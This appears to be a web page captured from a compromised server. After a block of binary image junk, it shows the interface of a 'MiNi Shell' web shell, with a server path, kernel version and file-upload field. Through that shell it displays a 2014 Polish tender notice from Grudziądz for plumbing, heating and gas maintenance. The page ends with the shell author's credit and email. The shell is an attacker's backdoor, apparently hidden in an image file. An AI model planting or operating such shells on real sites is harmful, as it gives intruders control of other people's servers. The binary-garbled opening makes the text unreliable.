JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141208/254069-N-2014.html

<p class="kh_header"><b>Grudziądz: Wykonanie prac konserwacyjnych  i usuwanie awarii instalacji  wodno - kanalizacyjnej, centralnego ogrzewania i gazowej w budynkach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki   Nieruchomościami  Sp. z o.o.   w  Grudziądzu  w  okresie  od  01.01.2015 r.  do  31.12.2016 r.</b><br>
<b>Numer ogłoszenia: 254069 - 2014; data zamieszczenia: 08.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami Sp. z o.o. w Grudziądzu , ul. Mickiewicza 23, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4512034.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac konserwacyjnych  i usuwanie awarii instalacji  wodno - kanalizacyjnej, centralnego ogrzewania i gazowej w budynkach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki   Nieruchomościami  Sp. z o.o.   w  Grudziądzu  w  okresie  od  01.01.2015 r.  do  31.12.2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi w zakresie wykonania prac
konserwacyjnych  i usuwanie awarii instalacji  wodno - kanalizacyjnej, centralnego
ogrzewania i gazowej w budynkach administrowanych przez Miejskie Przedsiębiorstwo Gospodarki   Nieruchomościami  Sp. z o.o.   w  Grudziądzu  w  okresie  od  01.01.2015 r. do  31.12.2016 r.  
Wykaz budynków będących w administracji MPGN Sp. z o.o. stanowi załącznik  Nr 1
i Nr 2  do umowy.
Wykonanie prac konserwacyjnych i usuwanie awarii w zakresie instalacji wodno - kanalizacyjnej i centralnego ogrzewania w 544 budynkach administrowanych przez Biuro Obsługi Mieszkańców Nr 1, Nr 2, Nr 3 w Grudziądzu
Biuro Obsługi Mieszkańców Nr 1	-	201 budynków
Biuro Obsługi Mieszkańców Nr 2	-	208 budynków
Biuro Obsługi Mieszkańców Nr 3	-	135 budynków
W budynkach  znajdują się w przeważającej części lokale mieszkalne oraz również użytkowe.
Prace konserwacyjne i usuwanie awarii będą zgłaszane lub zlecane Wykonawcy sukcesywnie w miarę potrzeb. 
Zlecenia prac określać będą zakres robót i termin ich wykonania.  
W przypadku wymiany instalacji wodociągowej, Wykonawca zobowiązany jest zachować możliwość poboru wody dla mieszkańców.
W przypadku awarii, Wykonawca zobowiązany jest przystąpić do usuwania awarii nie później niż w ciągu 8 godzin od otrzymania zgłoszenia.
Przez awarie Zamawiający rozumie nagłe, niezamierzone uszkodzenie instalacji 
lub urządzenia technicznego, mogące spowodować zagrożenie bezpieczeństwa  użytkowników budynku, narazić ich na straty materialne, spowodować przerwę 
w dostawie mediów. Wykonawca podejmuje czynności polegające na usunięciu przyczyn i skutków awarii.  
Przyjmowanie  zgłoszeń oraz usuwanie awarii odbywa się codziennie od poniedziałku 
do piątku w godz. od godz. 7oo  do 22oo  oraz w dni wolne ustawowo od pracy i w święta.
Zgłoszenia przekazywane będę Wykonawcy przez pracowników administracji 
jak i  mieszkańców budynków.  
Wykonawca ma obowiązek dostarczyć do administracji potwierdzenie wykonania zgłoszonych prac. 
Wykonanie prac konserwacyjnych i usuwanie awarii w zakresie instalacji gazowej  
w 461 budynkach administrowanych przez Biuro Obsługi Mieszkańców Nr 1, Nr 2, Nr 3 w Grudziądzu
Biuro Obsługi Mieszkańców Nr 1	-	165 budynków
Biuro Obsługi Mieszkańców Nr 2	-	171 budynków
Biuro Obsługi Mieszkańców Nr 3	-	125 budynków
W budynkach  znajdują się w przeważającej części lokale mieszkalne oraz również użytkowe.
Prace konserwacyjne i usuwanie awarii będą zgłaszane lub zlecane Wykonawcy sukcesywnie w miarę potrzeb. 
Każdorazowe zlecenie dotyczyć będzie określonego zakresu robót i terminu ich wykonania.   
Wykonawca zobowiązany jest przystąpić do realizacji robót w przypadku prac konserwacyjnych i usuwania awarii:
1. pojedynczych mieszkań w ciągu 24 godzin,
2. większej ilości mieszkań w danym budynku wielorodzinnym w ciągu 72 godzin.
W przypadku awarii, Wykonawca zobowiązany jest niezwłocznie przystąpić do usuwania awarii.
Przez awarie Zamawiający rozumie nagłe, niezamierzone uszkodzenie instalacji 
lub urządzenia technicznego, mogące spowodować zagrożenie bezpieczeństwa  użytkowników budynku, narazić ich na straty materialne, spowodować przerwę 
w dostawie mediów. Wykonawca podejmuje czynności polegające na usunięciu przyczyn i skutków awarii.  
W przypadku braku możliwości usunięcia awarii, Wykonawca zabezpiecza instalację w taki sposób aby nie powodowała zagrożenia dla ludzi i obiektów do zamknięcia zaworu głównego włącznie.  
Przyjmowanie  zgłoszeń oraz usuwanie awarii odbywa się codziennie od poniedziałku 
do piątku w godz. od godz. 7oo  do 22oo  oraz w dni wolne ustawowo od pracy i w święta.
Zgłoszenia przekazywane będę Wykonawcy przez pracowników administracji 
jak i  mieszkańców budynków.  
Wykonawca ma obowiązek dostarczyć do administracji potwierdzenie wykonania zgłoszonych prac. 
Zakres konserwacji urządzeń i instalacji wodno - kanalizacyjnej,  c. o. i gazowej 
Instalacja wodociągowa (wody zimnej, ciepłej i cyrkulacji)
Konserwacja instalacji i urządzeń wodociągowych w pomieszczeniach wspólnego użytku
polega na:
-usuwaniu przecieków, wymianie uszczelek lub wymianie uszkodzonych zaworów czerpalnych lub przelotowych, 
-wymianie odcinków rur w budynku, 
-zabezpieczeniu instalacji przed zamarzaniem oraz dokonywaniu odmrożeń instalacji,
-naprawie  i wymianie armatury w pralniach i pomieszczeniach wspólnego użytkowania, 
-naprawie  zaworów na poziomach i pionach łącznie z wymianą głowic zaworów dławicowych odcinających poszczególne mieszkania lokatorskie,
-wymiana wodomierzy i ich oplombowanie w nowo wybudowanych budynkach oddanych do eksploatacji,   
Instalacja kanalizacyjna, sanitarna i deszczowa
Konserwacja instalacji  kanalizacyjnej polega na:
-uszczelnieniu złącz, 
-oczyszczaniu studzienek rewizyjnych, wpustów podwórzowych,
-udrażnianiu podejść odpływowych w pomieszczeniach ogólnego użytku,
-przeczyszczaniu pionów i poziomów kanalizacyjnych w budynkach wraz z usuwaniem osadów i szlamu,
-sprawdzaniu drożności i wymianie  kratek ściekowych w pralniach, 
-przeczyszczaniu przykanalika łącznie ze studzienką,
-ochronie elementów instalacji przed wpływami zewnętrznymi i atmosferycznymi 
 w okresie zimowym, 
-usuwaniu zatorów powodujących wybijanie wód deszczowych z istniejących wpustów 
 i studzienek, 
-wymianie lub uzupełnieniu uszkodzonych bądź niedrożnych elementów instalacji
kanalizacyjnej, które powodują niesprawność instalacji  lub stwarzają zagrożenie
(np. włazów, wpustów deszczowych, odcinków rur spustowych),    
Instalacja centralnego ogrzewania
Konserwacja instalacji i urządzeń c. o. polega na:
-usuwaniu przecieków,
-malowaniu okresowym rur,
-wymianie uszkodzonych termometrów i manometrów (Zamawiający dostarczy klucze od kotłowni względnie od wymiennikowni) zainstalowanych na rozdzielaczach instalacji wewnętrznej,
-uzupełnianiu uszkodzonej izolacji cieplnej przewodów pionowych i poziomych 
w pomieszczeniach,
-pomiarze  temperatury w lokalach, 
-demontaż, montaż i oplombowanie ciepłomierzy podlegających sprawdzeniu w zakresie poprawności ich działania( bez kosztu ciepłomierzy) do eksploatacji,  
Usuwanie awarii instalacji centralnego ogrzewania w zakresie:
-odpowietrzanie grzejników,
-wymiana kryzy dławiącej w połączeniach śrubunkowych lub kołnierzowych,
-wymiana pękniętego odcinka rury instalacji c. o., 
-wymiana uszkodzonych zaworów na pionach oraz wymiana uszkodzonych zwykłych
 i termostatycznych zaworów grzejnikowych,
-w sezonie grzewczym uzupełnienie wody w wewnętrznej instalacji c. o. w budynkach
w których znajdują się rozdzielnie cieplne,
-wymiana niesprawnego grzejnika (pękniętego, przerdzewiałego),  
Instalacja gazowa 
- kontrola szczelności instalacji gazowej na postawie zgłoszenia lokatora lub administracji budynków ( BOM Nr 1, Nr 2, Nr 3).
- uszczelnianie instalacji gazowej wraz z wymianą  kształtek instalacyjnych 
w poszczególnych mieszkaniach i pomieszczeniach wspólnego użytkowania takich jak pralnie, suszarnie, korytarze piwnic, pomieszczenia techniczne i inne.
- sprawdzanie przejścia przewodów przez mury zewnętrzne budynków.
- sprawdzanie stanu urządzeń gazowych.
- okresowe malowanie na żółto rur gazowych: poziomów i pionów, a także odnawianie oznakowania na szafkach. 
- zmiana lokalizacji podłączenia odprowadzenia spalin od pieców gazowych 
do przewodów kominowych bez zmiany usytuowania pieca - na podstawie opinii kominiarskiej.
- naprawa i konserwacja kurków gazowych na poziomach i pionach gazowych, włącznie z kurkami gazowymi odcinającymi poszczególne mieszkania lokatorskie.
- zabezpieczenie pomieszczeń i szafek na głównych kurkach gazowych.
- naprawa i konserwacja taboretów gazowych (włącznie z wymianą zaworu odcinającego) wraz z uzupełnienie pokręteł. 
Z uwagi na zakres przedmiotu zamówienia,  zaleca się posiadanie przez Wykonawcę:
-stałej bazy techniczno - magazynowej w Grudziądzu lub w odległości do 15 km od miasta Grudziądza,
-telefonu stacjonarnego lub komórkowego  umożliwiającego zgłaszanie awarii
UWAGA: Koszty za dojazdy przy wykonywaniu prac objętych zamówieniem, Wykonawca winien skalkulować w kosztach ogólnych.
Zamawiający nie będzie honorował w kosztach powykonawczych zapisu koszt dojazdu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2, 50.70.00.00-3, 50.80.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 10 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie wykonania, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej 1 usługi w zakresie konserwacji i usuwania awarii  instalacji wodno - kanalizacyjnej, centralnego ogrzewania lub gazowej  w ramach jednego kontraktu o wartości minimum 200 000,00 zł brutto z podaniem ich wartości przedmiotu, dat wykonania i podmiotów na rzecz których zostały wykonane  oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie odpowiednim potencjałem technicznym niezbędnym do realizacji zamówienia 
-min 3 samochody dostawcze,
-min 3 zestawy spawalnicze, 
-min 3 zgrzewarki do rur z tworzyw sztucznych 
-min 3 detektory pomiaru ulatniania się gazu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie osobami posiadającymi kwalifikacje zawodowe , doświadczenie i uprawnienia w rozumieniu ustawy z dnia 7 lipca 1994r. - Prawo budowlane na stanowisku kierownik robót instalacji wodno - kan. c.o. i gazowej,
- wymagane jest dysponowanie do bezpośredniego wykonawstwa zamówienia  6 osobami ( 3 ekipy ) w tym  3 osoby  posiadające uprawnienia do zajmowania się eksploatacją urządzeń i instalacji cieplnych, wodociągowo -  kanalizacyjnych i 3 osoby  posiadające kwalifikacje uprawniające do zajmowania się eksploatacją urządzeń i instalacji gazowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie opłaconej polisy a w przypadku jej braku innego dokumentu,
potwierdzającego,  że Wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mpgn.grudziadz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiortswo Gospodarki Nieruchomościami Sp. z o.o.
ul. Mickiewicza 23,  86 -300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2014 godzina 11:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami Sp.  z o.o. 
ul. Mickiewicza 23, 86 -300 Grudziądz wejście A- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com